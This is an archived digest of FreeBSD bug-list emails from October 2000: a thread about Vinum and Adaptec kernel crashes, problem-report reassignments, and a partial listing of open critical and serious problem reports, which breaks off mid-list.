Internet plc. [joe@pavilion.net, joe@uk.freebsd.org, joe@tao.org.uk] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 30 8:47:48 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id A044237B4C5 for ; Mon, 30 Oct 2000 08:47:41 -0800 (PST) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13qI5q-0003cI-00; Mon, 30 Oct 2000 18:47:30 +0200 Date: Mon, 30 Oct 2000 18:47:30 +0200 (IST) From: Roman Shterenzon To: Josef Karthauser Cc: freebsd-bugs@FreeBSD.ORG, grog@lemis.net Subject: Re: kern/22103: 4.1-R with Adaptec and Vinum crashes on periodic daily In-Reply-To: <20001030164448.E16053@pavilion.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 30 Oct 2000, Josef Karthauser wrote: > On Mon, Oct 30, 2000 at 02:20:03AM -0800, Roman Shterenzon wrote: > > The following reply was made to PR kern/22103; it has been noted by GNATS. > > > > From: Roman Shterenzon > > To: freebsd-gnats-submit@FreeBSD.org > > Cc: > > Subject: Re: kern/22103: 4.1-R with Adaptec and Vinum crashes on periodic > > daily > > Date: Mon, 30 Oct 2000 12:12:30 +0200 (IST) > > > > I took another dump today, it crashed in the same place: > > > > #63 0xc150fc67 in complete_rqe () at /usr/src/sys/modules/vinum/../../dev/vinum/vinuminterrupt.c:199 #64 0xc0178d6b in biodone (bp=0xc1caf820) at ../../kern/vfs_bio.c:2637 > > #65 0xc0126bb9 in dadone (periph=0xc14ca700, done_ccb=0xc184c800) at ../../cam/scsi/scsi_da.c:1246 > > I believe that this is the same problem as I've detailed in kern/21915. > I'm currently setting up a remote debugging environment and speaking > with Greg (vinum author) so that we can get it tracked down. I've got > three unusable machines because of this bug. I'm sorry, I had to remove vinum disks and put them aside meanwhile, and we work with signle disk with backup meanwhile. So, basically speaking, it will be a problem for me to continue helping with kdb. I waited for almost a month, but since the last terrible crash which introduced severe filesystem corruption we cannot stand it any longer. Sorry. P.S. I'm about to order Mylex, I hope its support is more stable than vinum. --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 30 8:53: 8 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from bramg1.net.external.hp.com (bramg1.net.external.hp.com [192.6.126.73]) by hub.freebsd.org (Postfix) with ESMTP id 7023337B4D7; Mon, 30 Oct 2000 08:53:06 -0800 (PST) Received: from atlas.br.itc.hp.com (atlas.br.itc.hp.com [15.145.24.131]) by bramg1.net.external.hp.com (Postfix) with ESMTP id C0A7B154; Mon, 30 Oct 2000 17:53:04 +0100 (MET) Received: from loddon.br.itc.hp.com (loddon.br.itc.hp.com [15.145.8.166]) by atlas.br.itc.hp.com (8.9.3 (PHNE_18979)/8.9.3 SMKit6.0.6 OpenMail) with SMTP id QAA25815; Mon, 30 Oct 2000 16:53:03 GMT Received: from 15.145.8.166 by loddon.br.itc.hp.com (InterScan E-Mail VirusWall NT); Mon, 30 Oct 2000 16:53:02 -0000 (GMT Standard Time) Received: by loddon.br.itc.hp.com with Internet Mail Service (5.5.2650.21) id <47NK8JH2>; Mon, 30 Oct 2000 16:53:02 -0000 Message-ID: <0B9A57FF1D57D411B47500D0B73E5CC108722C@dickens.bri.hp.com> From: "JONES,KEITH (Non-HP-UnitedKingdom,ex2)" To: "'brian@freebsd.org'" Cc: "'freebsd-bugs@freebsd.org'" Subject: Re: ports/22217: [PATCH] UK phone codes out of date Date: Mon, 30 Oct 2000 16:53:01 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, With the imminent release of 4.2 I thought I'd better draw your attention to the above PR I sent in a week or so ago, since it hasn't been assigned and you're listed as the maintainer: http://www.freebsd.org/cgi/query-pr.cgi?pr=22217 Admittedly it's pretty trivial but it'd be nice to get this things right (or at least a little less wrong)! Ta, Keith -- Keith Jones E-Business Service Introduction, GBIT-E (Bristol) E: keith_jones@non.hp.com T: [+44 117] 312-7602 I don't speak for Hewlett-Packard. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 30 8:59:28 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from genius.systems.pavilion.net (genesis.tao.org.uk [194.242.131.254]) by hub.freebsd.org (Postfix) with ESMTP id 6FBE437B4CF for ; Mon, 30 Oct 2000 08:59:24 -0800 (PST) Received: by genius.systems.pavilion.net (Postfix, from userid 100) id 2B1A49B23; Mon, 30 Oct 2000 17:02:52 +0000 (GMT) Date: Mon, 30 Oct 2000 17:02:51 +0000 From: Josef Karthauser To: Roman Shterenzon Cc: freebsd-bugs@FreeBSD.ORG, grog@lemis.net Subject: Re: kern/22103: 4.1-R with Adaptec and Vinum crashes on periodic daily Message-ID: <20001030170251.H16053@pavilion.net> References: <20001030164448.E16053@pavilion.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from roman@xpert.com on Mon, Oct 30, 2000 at 06:47:30PM +0200 X-NCC-RegID: uk.pavilion Organisation: Pavilion Internet plc, Lees House, 21-23 Dyke Road, Brighton, England Phone: +44-845-333-5000 Fax: +44-845-333-5001 Mobile: +44-403-596893 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Oct 30, 2000 at 06:47:30PM +0200, Roman Shterenzon wrote: > On Mon, 30 Oct 2000, Josef Karthauser wrote: > > > I believe that this is the same problem as I've detailed in kern/21915. > > I'm currently setting up a remote debugging environment and speaking > > with Greg (vinum author) so that we can get it tracked down. I've got > > three unusable machines because of this bug. > I'm sorry, I had to remove vinum disks and put them aside meanwhile, and > we work with signle disk with backup meanwhile. So, basically speaking, > it will be a problem for me to continue helping with kdb. > I waited for almost a month, but since the last terrible crash which > introduced severe filesystem corruption we cannot stand it any longer. > Sorry. > > P.S. I'm about to order Mylex, I hope its support is more stable than > vinum. I don't know about that but we've got a DPT card that's running nicely with the new asr driver. Joe -- Josef Karthauser FreeBSD: How many times have you booted today? Technical Manager Viagra for your server (http://www.uk.freebsd.org) Pavilion Internet plc. [joe@pavilion.net, joe@uk.freebsd.org, joe@tao.org.uk] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 30 10:20:53 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C00A437B479; Mon, 30 Oct 2000 10:20:51 -0800 (PST) Received: (from johan@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA84101; Mon, 30 Oct 2000 10:20:51 -0800 (PST) (envelope-from johan@FreeBSD.org) Date: Mon, 30 Oct 2000 10:20:51 -0800 (PST) From: Message-Id: <200010301820.KAA84101@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, cracauer@FreeBSD.org Subject: Re: bin/2934: sh(1) has problems with $ENV Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: sh(1) has problems with $ENV Responsible-Changed-From-To: freebsd-bugs->cracauer Responsible-Changed-By: johan Responsible-Changed-When: Mon Oct 30 10:20:22 PST 2000 Responsible-Changed-Why: Over to sh(1) maintianer. http://www.freebsd.org/cgi/query-pr.cgi?pr=2934 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 30 10:24:51 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 2527437B479; Mon, 30 Oct 2000 10:24:36 -0800 (PST) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id TAA00562; Mon, 30 Oct 2000 19:24:34 +0100 (CET) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: billf@FreeBSD.org Cc: freebsd-bugs@FreeBSD.org Subject: Re: bin/22401: pkg_add -r does a segmentation fault References: <200010292348.PAA50084@freefall.freebsd.org> From: Dag-Erling Smorgrav Date: 30 Oct 2000 19:24:33 +0100 In-Reply-To: billf@FreeBSD.org's message of "Sun, 29 Oct 2000 15:48:52 -0800 (PST)" Message-ID: Lines: 14 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org billf@FreeBSD.org writes: > Responsible-Changed-From-To: freebsd-bugs->des > Responsible-Changed-By: billf > Responsible-Changed-When: Sun Oct 29 15:47:59 PST 2000 > Responsible-Changed-Why: > Dag-Erling already committed a fix (of a fix) in -current, > I suppose this serves as a reminder to merge before 4.2-RELEASE Already done, but there's another problem in pkg_add(8) that needs MFCing; I'm waiting for maintainer approval. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 30 11: 1:42 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6F55237B4C5 for ; Mon, 30 Oct 2000 11:00:22 -0800 (PST) Received: (from peter@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA98084 for freebsd-bugs@freebsd.org; Mon, 30 Oct 2000 11:00:09 -0800 (PST) (envelope-from owner-bugmaster@freebsd.org) Date: Mon, 30 Oct 2000 11:00:09 -0800 (PST) Message-Id: <200010301900.LAA98084@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: FreeBSD bugs list Subject: Current problem reports Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Current FreeBSD problem reports The following is a listing of current problems submitted by FreeBSD users. These represent problem reports covering all versions including experimental development code and obsolete releases. Bugs can be in one of several states: o - open A problem report has been submitted, no sanity checking performed. a - analyzed The report has been examined by a team member and evaluated. f - feedback The problem has been solved, and the originator has been given a patch or a fix has been committed. The PR remains in this state pending a response from the originator. s - suspended The problem is not being worked on. This is a prime candidate for somebody who is looking for a project to do. If the problem cannot be solved at all, it will be closed, rather than suspended. c - closed A problem report is closed when any changes have been integrated, documented, and tested. Critical problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- o [1997/03/08] kern/2923 panic: vm_fault: fault on nofault entry, o [1997/12/21] kern/5355 bp Fix for NULLFS problems o [1998/02/03] kern/5641 jasone running processes at the IDLE priority (i o [1998/02/10] kern/5703 CDROM Media Error triggers complete syste s [1998/05/13] kern/6630 julian [PATCH] Fix for Cyrix I8254 bug o [1998/07/12] kern/7264 gibbs Buslogic BT 950 scsi card not detected o [1998/08/15] kern/7622 Kernel panic with Fatal trap 18. o [1998/09/08] i386/7859 luigi fatal trap 12 in midi_synth_input o [1998/09/28] kern/8074 se CAM rescan operation fatal o [1998/10/03] gnu/8138 obrien gcc -pipe xxx.s hangs f [1998/10/06] i386/8179 Install failure with motherbord using SIS a [1998/11/08] ports/8609 nectar eklogin service (kerberos klogind) fails o [1998/11/24] bin/8829 bug in innetgr (was: Fix port: security/s o [1998/11/25] kern/8861 mdodd under heavy (multi interface) traffic ep0 f [1998/12/09] kern/9036 Boot 3.0-Release hangs with BT-445S after o [1999/02/19] kern/10166 panic during heavy sio i/o;no coproc; ves o [1999/02/20] kern/10172 [panics] Kernel (esp kern/sys_pipe.c) die s [1999/02/26] kern/10281 Crash of 3.1-STABLE system due to scsi er o [1999/03/01] kern/10332 gibbs System freezes during certain SCSI activi o [1999/03/07] misc/10473 Incorrect aout compat libraries in XF8633 o [1999/03/09] kern/10507 Process hangs in state VM pgd o [1999/03/09] misc/10509 Cvs can hang system when used with pserve o [1999/03/09] kern/10520 bp can't exec files under nullfs o [1999/03/11] kern/10542 page fault while in kernel mode, not kern o [1999/03/11] kern/10545 When a fork/exec stress test is run, the o [1999/03/12] misc/10566 obrien patch dhcpc problem on /etc/pccard_ether o [1999/03/17] kern/10636 ipfw problems o [1999/03/20] i386/10690 Installation freezes after device selecti f [1999/03/20] kern/10701 ppbus printing problems o [1999/03/22] ports/10725 stb Wrong Cyrus IMAP deliver group o [1999/03/23] bin/10744 call to login() from aout/libutil.so.2.2 o [1999/03/27] kern/10828 3.1-STABLE freezes when writing to floppy o [1999/03/30] kern/10872 Panic in sorecieve() due to NULL mbuf poi o [1999/04/05] ports/10965 obrien lcc-3.6 unable to compile anything f [1999/04/13] kern/11112 Amanda on FreeBSD can wipe the _next_ tap f [1999/04/17] kern/11196 kernel mode page fault o [1999/04/20] kern/11238 Synchronous PPP not functional in leased o [1999/04/20] kern/11241 Install fails after SCSI probe o [1999/04/23] i386/11298 sos Enabling IDE DMA on Opti Viper-M crashes o [1999/04/27] kern/11351 system reboot for error with popper and d o [1999/05/10] kern/11629 dillon File descriptor table sharing is broken o [1999/05/12] kern/11680 server freezes, all processes stuck in "i o [1999/05/13] i386/11681 gibbs Adaptec 2940 UW SCSI Controller BIOS 1.34 o [1999/05/14] kern/11707 ncr isn't recognized in 3.1-19990512-STAB o [1999/05/24] kern/11869 wpaul Network hangging due to xl0: tx underrun o [1999/05/31] kern/11966 TCP copies send and receive socket buffer o [1999/06/02] kern/11988 recvmsg with a cmsghdr but no iovec is br f [1999/06/05] kern/12041 n_hibma Crashes on startup if Zip drive is switch o [1999/06/07] kern/12072 vm_fault happened in binary file transfer o [1999/06/09] kern/12106 error 6: panic: cannot mount root o [1999/06/10] kern/12127 persistent crash on idle SMP system o [1999/06/16] kern/12248 CRON in malloc(): warning: pointer to wr o [1999/06/18] i386/12286 Segmentation violation when invoking JNI s [1999/06/23] kern/12367 Writing files larger than floppy capacity o [1999/06/25] kern/12395 gibbs Buslogic SCSI cards (BT948) time out unde o [1999/06/30] kern/12466 Fast system hangs under high FS load o [1999/07/05] kern/12521 lmbench-1.1's context switching test hang o [1999/07/12] misc/12607 System crashes after boot, portmap endles o [1999/07/13] alpha/12623 alpha Certain valid numeric strings cause a SIG f [1999/07/20] misc/12720 gdbm (And possibly other libraries in /us o [1999/07/21] kern/12730 poll() causes indeterministic program han o [1999/07/21] misc/12743 Cannot boot the 3.2 floppies o [1999/08/02] misc/12923 Installation fails on HP Net Server o [1999/08/06] bin/12998 des still inetd junk pointer too low to make o [1999/08/10] i386/13059 imp Install aborts with panic:aha0: Invalid C a [1999/08/20] kern/13270 dillon NFS hangs if written through self-mount o [1999/08/23] alpha/13338 alpha panic: pmap_remove_all: pv_table for 162b o [1999/08/24] kern/13352 No support for Promise Ultra/66 o [1999/08/30] misc/13474 Maximum Number of IPs Permitted in the .. o [1999/09/09] alpha/13653 alpha panic: pmap_remove_all: pv_table for 90b6 o [1999/09/12] kern/13709 panic: sched_sync: fsync failed o [1999/09/19] kern/13825 tx0 "holds" packets for long periods, eve o [1999/09/19] i386/13844 keyboard locks up when I page through a m f [1999/09/20] i386/13849 grog dump on vinum r5 freezes system o [1999/09/22] i386/13892 Kern.flp does not boot on Compaq Presario o [1999/09/24] i386/13933 nfs server panics in tulip_rx_intr() o [1999/09/24] kern/13940 Panic with dd on block/"cooked" devices u o [1999/09/24] kern/13944 ATAPI cd-rom not boot to install, nor de o [1999/09/27] misc/13995 Full duplex mode doesn't work right with o [1999/09/28] kern/14028 ATAPI cd-rom not boot to install and can' o [1999/09/28] i386/14030 imp aha0 probe fails 3.3.0-RELEASE install wi o [1999/10/05] kern/14141 3.3-RELEASE crashing often o [1999/10/06] kern/14162 sudden reboot problem ( maybe kernel pani o [1999/10/08] misc/14204 error 6: panic: cannot mout root(2) o [1999/10/10] i386/14256 System doesn't boot under FreeBSD 3.2 o [1999/10/14] kern/14322 mount respects permissions of underlying o [1999/10/15] kern/14347 kdump & truss won't compile because addit f [1999/10/24] i386/14492 FreeBSD won't install/work with an Asus S o [1999/10/25] kern/14510 kernel panic while pressing panic o [2000/02/09] i386/16620 mdodd 4.0-20000208-CURRENT fails to boot on ASU o [2000/02/14] kern/16708 wpaul 3Com 3c900-Combo Ehternet card make kerne o [2000/02/15] kern/16740 mckusick The kernel panics with "ffs_clusteralloc: o [2000/02/18] i386/16802 An user math program have the system on K o [2000/02/19] kern/16828 High Speed Pinging Over 8184 bytes Kills o [2000/02/21] kern/16890 Fatal trap 12: page fault while in kernel o [2000/02/26] kern/17011 Fatal trap 12 occur, dhclient with BOOTP o [2000/02/28] kern/17067 consistent "make -k buildworld" crash wit o [2000/03/03] kern/17152 alfred kernel panic:aio_write o [2000/03/07] kern/17248 FreeBSD 3.4 won't install on 486/100 IBM o [2000/03/10] kern/17305 advansys driver time-out around 30 minute o [2000/03/12] kern/17339 3.4-R on a K6-2: panic: pmap_release: fre o [2000/03/15] i386/17391 jhb FreeBSD boot loader does not recognize ke f [2000/03/15] i386/17398 imp Install failure of 4.0-Release via ftp an o [2000/03/15] kern/17400 sos panic: resource_list_alloc when booting o [2000/03/18] i386/17485 Partition editor completely non-functiona o [2000/03/22] i386/17558 ncr1 controller is not working properly i o [2000/03/23] kern/17565 4.0-RELEASE install does not access IDE d o [2000/03/27] kern/17620 jhay Digi/570i sync driver (if_ar.c) causes sy o [2000/03/28] alpha/17642 alpha FreeBSD/alpha 4.0 RELEASE installation fa o [2000/03/28] kern/17643 sos 3.4 to 4.0 upgrade: ATAPI drivers damage o [2000/03/29] i386/17661 sos 4.0-REL hangs after detecting ata1 o [2000/04/03] kern/17776 RAID5 with crashed disk corrupts filesyst o [2000/04/03] i386/17778 sos 4.0-RELEASE will not recognize IDE Contro o [2000/04/04] bin/17791 Restore does not handle bad or missing ta o [2000/04/04] misc/17793 Keyboard not found o [2000/04/04] ports/17806 msmith make in ports/net/citrix_ica loops on scr o [2000/04/04] i386/17808 cannot swap /dev/.... o [2000/04/05] kern/17821 Wavelan driver not working in 4.0 o [2000/04/08] kern/17870 n_hibma 4.0-release consistently crashes a couple o [2000/04/09] kern/17881 4.0-RELEASE kern.flp boot crashes upon pr f [2000/04/13] kern/17971 cannot boot 4.0 floppies to install o [2000/04/18] kern/18074 Fatal trap 12: page fault while in kernel o [2000/04/20] i386/18123 4.0-RELEASE crashes during boot from CD-R o [2000/04/23] kern/18182 Remote serial gdb no longer works since m o [2000/04/24] bin/18198 owner of ccontrol file in spool dir is wr o [2000/04/24] misc/18201 Freeze at boot time when trying to upgrad o [2000/04/25] misc/18205 Install via CD-Romm hangs o [2000/04/25] i386/18207 3.2-RELEASE to 4.0-RELEASE FTP upgrade fa o [2000/04/27] kern/18265 Vendor specific word = FFFF o [2000/05/01] kern/18335 sos FreeBSD 4.0 has a "WRITE command timeout f [2000/05/04] kern/18387 grog when performing certain vinum operations, o [2000/05/09] misc/18466 dillon install via nfs or ftp media silently tru o [2000/05/13] bin/18531 installation will not read files frm flop o [2000/05/16] ports/18606 billf cannot install the latest ucd-snmp port o [2000/05/17] kern/18623 out of swap s [2000/05/17] misc/18641 paul FreeBSD V4.0 crashes when using ifconfig o [2000/05/18] i386/18655 4.0-RELEASE Fails to install o [2000/05/18] kern/18665 Unpredictable crashes. Page fault while i o [2000/05/21] kern/18712 Kernel panic o [2000/05/22] kern/18754 grog Vinum: reviving RAID5 volume corrupts dat o [2000/05/23] misc/18786 SCSI hangs during FreeBSD 4.0 installatio s [2000/05/24] misc/18793 ken Hitachi DK319H needs quirk entry to work o [2000/05/25] alpha/18808 alpha Unalligned trap handler fails on quadword o [2000/05/29] kern/18874 32bit NFS servers export wrong negative v o [2000/05/29] bin/18887 Undefined symbol "_krb_err_txt" in telnet f [2000/06/03] kern/18982 make buildworld freezes my machine with a o [2000/06/04] kern/19000 Automatic Reebot, Fatal o [2000/06/05] kern/19022 pcm driver causes immediate panic on use o [2000/06/05] i386/19027 FTP install operation does not find XFree f [2000/06/09] kern/19162 asmodai 4.0-STABLE panics w/ softupdates and quot o [2000/06/10] misc/19175 mounting NFS can be done multiple times C o [2000/06/13] kern/19247 jasone uthread_sigaction.c does not do anything o [2000/06/14] misc/19257 Detection of connected ports on a Cyclom o [2000/06/15] kern/19297 Multi-processor kernel fails to boot on T o [2000/06/16] conf/19336 write failure when adding distribution fi o [2000/06/16] i386/19338 ProLiant DL360 dual proc. locks when boot o [2000/06/17] kern/19353 Cannot install 4.0 o [2000/06/22] misc/19441 4.0-STABLE (06/21/00) Panics On bootup o [2000/06/23] kern/19480 System hang when use current (GENERIC) ke o [2000/06/26] bin/19529 Burning cdrom with burncd fails o [2000/06/27] kern/19551 bmilekic panic when enabling bridge_ipfw o [2000/06/28] kern/19572 executing command cd ../cdrom after mount a [2000/06/30] ports/19613 nate java causing SIGSEGV 11* segmentation vi o [2000/07/01] conf/19629 imp /etc/rc.sysctl can't set all syctls f [2000/07/03] kern/19661 imp hang or reboot when pcmcia ethernet adapt o [2000/07/05] kern/19726 wpaul fatal trap 12 / page fault o [2000/07/09] kern/19794 FreeBSD 4.0-Stable crash o [2000/07/12] gnu/19882 obrien ld does not detect all undefined symbols! o [2000/07/13] ports/19888 ports qpopper3 dumps core for APOP authetificat f [2000/07/20] i386/20069 sos hard crash, errors with freebsd 4.0 (waln o [2000/07/20] ports/20077 jmz Latex 99.12 fails to make completely f [2000/07/25] kern/20175 Unknown Ethernet Card o [2000/07/26] misc/20205 FreeBSD 4 will not install on a Compaq Pr o [2000/07/27] kern/20227 jlemon 4.1-RC: UDP checksum problem f [2000/07/29] kern/20296 sheldonh matcd driver is a) not in GENERIC and b) o [2000/07/30] i386/20308 yokota vidcontrol VESA_800x600 causes a kernel p f [2000/07/31] kern/20310 groudier Symbios 53c875j drivers don't work a [2000/07/31] kern/20312 tegge IO APIC problems o [2000/08/01] misc/20353 4.1 doesn't work on Compaq ML370 o [2000/08/03] kern/20375 APM doesn't work properly! Suspend/resum f [2000/08/03] i386/20379 unable to install, monitor goes black dur o [2000/08/04] kern/20394 sos kernel fails to recognize the second IDE o [2000/08/05] kern/20429 yokota setting flags 0x1 in atkbd0 locks keyboar o [2000/08/08] kern/20484 jlemon FreeBSD 4.0 crashes repeatedly: trap 12: o [2000/08/08] bin/20489 davidn pw problems: -w random not working correc o [2000/08/08] i386/20495 yokota 4.1-STABLE and 4.1-RELEASE: keyboard does o [2000/08/11] kern/20534 sos ata panic: resource_list_alloc: resource a [2000/08/13] kern/20573 sos ATA MFC Breaks -STABL o [2000/08/15] ports/20624 emulationvmware vmmon module locks kernel o [2000/08/16] kern/20671 wpaul panicstr:page fault; panic messages:Fatal f [2000/08/22] kern/20776 rnordier Cannot boot the install floppy for versio o [2000/08/22] i386/20791 gibbs Adaptec 2940UW bootup errors in FSD 4.0/3 o [2000/08/28] kern/20895 groudier sym driver doesn't work for SYM53C895A o [2000/08/31] gnu/20966 obrien binutils break C++ in GCC 2.95.x and GCC- o [2000/09/02] i386/20994 /etc/fstab or kernel not correctly instal f [2000/09/02] kern/21009 /etc/security make the system hangup o [2000/09/04] misc/21025 msmith BTX loader 1.00 gets 1Gb of memory from B f [2000/09/04] i386/21042 mdodd Keyboard driver problems with PS/2 Model o [2000/09/04] kern/21046 sos ATAPI interface hangs during install of 4 f [2000/09/05] i386/21071 gibbs SCSI Controller Not Detected When Attempt o [2000/09/05] i386/21072 sos Unable to install. Can't write disklabel o [2000/09/06] kern/21079 ume IPSEC, kernel ARPs for tunnel endpoint in f [2000/09/08] i386/21117 When booting 4.0 install disk receive thi f [2000/09/09] kern/21148 grog multiple crashes while using vinum o [2000/09/12] kern/21220 msmith mlx0: I/O error - attempt to write beyond o [2000/09/13] bin/21253 dump/restore fail on any stream (tape/pip o [2000/09/14] misc/21269 Install does not see disk on Advansys car o [2000/09/14] kern/21272 wpaul USB interrupts seem to be turned off o [2000/09/14] kern/21278 gibbs ahc driver wedges on stressed SMP system o [2000/09/17] kern/21323 msmith Lock up at boot on Acer507DX with pci.c 1 o [2000/09/18] kern/21378 Accessing floppy under 4.1-STABLE (with D o [2000/09/19] kern/21397 Floppy drive doesn't work on Compaq ProLi o [2000/09/20] kern/21438 cg Sox recording in 16 bits creates a panic: o [2000/09/21] ports/21466 jseger port xpaint-2.5.7 won't make install f [2000/09/22] misc/21480 Harddrive death after FreeBSD Install o [2000/09/26] bin/21566 passwd does not work after updating from o [2000/09/27] kern/21592 insufficient PAP authentication in isp pr o [2000/10/01] i386/21677 Instalation crashed when shell started o [2000/10/02] i386/21717 DOS while opening /dev/audio o [2000/10/04] kern/21757 cp from nullfs-mounted filesystem aborts o [2000/10/04] i386/21758 X display font problem o [2000/10/05] i386/21772 No interrupts for 39160 PCI adapter in PR f [2000/10/05] kern/21773 sos panic w/nexus + ata (ivar problem) o [2000/10/06] misc/21782 4.1.1 and ADAPTEC 29160N SCSI controller o [2000/10/06] kern/21783 When msgrcv() blocks, it blocks ALL threa o [2000/10/06] kern/21790 marcel fstat64 does not exist in Linux emulation o [2000/10/06] i386/21802 after working fine for a few weeks, mach o [2000/10/08] kern/21831 gibbs kernel trap 12 crash in 4.1.1-STABLE o [2000/10/08] kern/21845 crash, while tring to send udp via half-b o [2000/10/09] misc/21861 PostgreSQL on jailed enviroment fails o [2000/10/11] kern/21915 gibbs Machine dies sig 12 in ahc driver (Freebs o [2000/10/12] ports/21927 dirk Error installing openssl f [2000/10/12] kern/21929 lpd cause system crash o [2000/10/12] kern/21932 gibbs 4.1.1-RELEASE : trap 12 during install o [2000/10/14] gnu/21983 obrien gcc fails to link shared libraries agains o [2000/10/14] ports/21993 ports Port graphics/sane build fails with the n o [2000/10/16] ports/22020 ports apache13-modssl dies on alloc.c o [2000/10/18] bin/22077 X-Windows broken o [2000/10/18] kern/22086 DMA errors during intensive disk activity o [2000/10/18] kern/22103 4.1-R with Adaptec and Vinum crashes on p o [2000/10/19] alpha/22128 alpha Cannot install 4.1.1 on an Alpha AS200 o [2000/10/19] kern/22141 Missing include file in if_tx.c o [2000/10/22] kern/22224 ipfw pipe command causes kernel panic o [2000/10/23] i386/22236 mouse cursor bug under text console mode o [2000/10/23] i386/22240 unstable UDMA on Iwill VD133PL v1.6 (Apol a [2000/10/23] kern/22245 Incorrect handling of end-of-media in ata o [2000/10/25] ports/22302 ports port audio/cdrdao fails to build with "ma o [2000/10/26] kern/22324 Kernel panic when second Compaq Smart Arr o [2000/10/26] ports/22326 ports update of the mail/minimalist o [2000/10/27] misc/22345 mouse setup o [2000/10/28] kern/22376 Some problems in ar driver with FastTrak o [2000/10/29] kern/22391 panic: worklist_remove: not on list o [2000/10/29] bin/22394 NT based DNS slaves can't make zone trans o [2000/10/29] bin/22404 Solution of "passwd" and "cannot set pass o [2000/10/30] ports/22418 ports sysutils/pib (pib-1.2) make patch failed 283 problems total. Serious problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- o [1995/10/18] bin/786 wpaul Problem with NIS and large group maps f [1996/08/22] kern/1533 dillon Machine can be panicked by a userland pro o [1996/09/29] kern/1689 TCP extensions throttles distant connecti s [1996/10/26] bin/1892 n_hibma install(1) removes target file s [1996/11/08] gnu/1981 ypserv handles null key incorrectly f [1996/12/22] kern/2270 Hayes ESP serial card locks system as of a [1996/12/30] kern/2325 quota.user enlarged, no boot on 2.2-BETA f [1997/01/09] bin/2430 grog mountd stops on loading if subnet mask is o [1997/02/07] kern/2690 asami When Using ccd in a mirror mode, file cre o [1997/02/16] gnu/2749 peter cvs export using remote cvs fails - CVS/T o [1997/02/19] kern/2768 ktrace(1) -i dumps corrupted trace data o [1997/02/20] bin/2785 wpaul callbootd uses an unitialized variable o [1997/02/22] kern/2800 DDS large data writing probrem f [1997/03/01] kern/2840 mlock+minherit+fork+munlock causes panics o [1997/03/03] kern/2858 peter FreeBSD NFS client can't mount filesystem o [1997/04/01] bin/3170 vi freaks and dump core if user doesn't e o [1997/04/05] kern/3201 peter de0 not re-enabled after hub down o [1997/04/06] kern/3219 sppp or arnet gets looped after connectio o [1997/04/25] kern/3381 peter 2.2.x kernel panic on traversing and remo o [1997/04/25] kern/3384 telldir-seekdir can cause livelock o [1997/05/01] kern/3463 netstat -I packet count increase on sl0 w f [1997/05/04] i386/3502 mdodd Merge of if_ix* and if_ie* broke EE/16 su o [1997/05/06] bin/3524 imp rlogin doesn't read $HOSTALIASES for non- o [1997/05/12] kern/3579 peter de driver doesn't support newer SMC 9332 o [1997/05/12] kern/3581 intermittent trap 12 in lockstatus() f [1997/05/12] kern/3582 panic: bad dir (mangled entry) in 2.2-STA s [1997/05/25] kern/3685 [PATCH] panic: fdesc attr o [1997/05/30] kern/3726 peter process hangs in 2.2-stable when working f [1997/06/03] kern/3771 dillon NFS hangs when writing to local FS re-mou f [1997/06/04] i386/3779 changing cursor to blinking block causes o [1997/06/28] misc/3980 peter access via NFS 